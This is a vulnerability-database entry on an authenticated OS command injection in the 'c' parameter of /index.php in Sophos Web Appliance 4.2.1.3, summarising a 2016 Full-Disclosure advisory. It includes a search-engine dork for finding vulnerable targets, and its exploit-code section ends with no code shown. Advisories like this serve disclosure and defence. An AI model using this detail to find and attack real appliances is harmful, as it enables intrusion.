A vulnerability, which was classified as critical, has been found in Sophos Web Appliance 4.2.1.3. This issue affects an unknown functionality of the file /index.php. The manipulation of the argument c with the input value logs leads to a os command injection vulnerability. Using CWE to declare the problem leads to CWE-78. The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. Impacted is confidentiality, integrity, and availability.
The weakness was shared 11/04/2016 by Matt Bergin as KL-001-2016-009 : Sophos Web Appliance Remote Code Execution as confirmed mailinglist post (Full-Disclosure). The advisory is shared at seclists.org. The vendor cooperated in the coordination of the public release. The mailinglist post contains:
An authenticated user of any privilege can execute arbitrary system commands as the non-root webserver user.The exploitation is known to be easy. The attack may be initiated remotely. The successful exploitation needs a simple authentication. Technical details as well as a public exploit are known. MITRE ATT&CK project uses the attack technique T1202 for this issue.
A public exploit has been developed by Matt Bergin in HTTP POST Request and been published immediately after the advisory. The exploit is available at seclists.org. It is declared as proof-of-concept. The vulnerability was handled as a non-public zero-day exploit for at least 34 days. During that time the estimated underground price was around $0-$5k. By approaching the search of inurl:index.php it is possible to find vulnerable targets with Google Hacking. The code used by the exploit is:
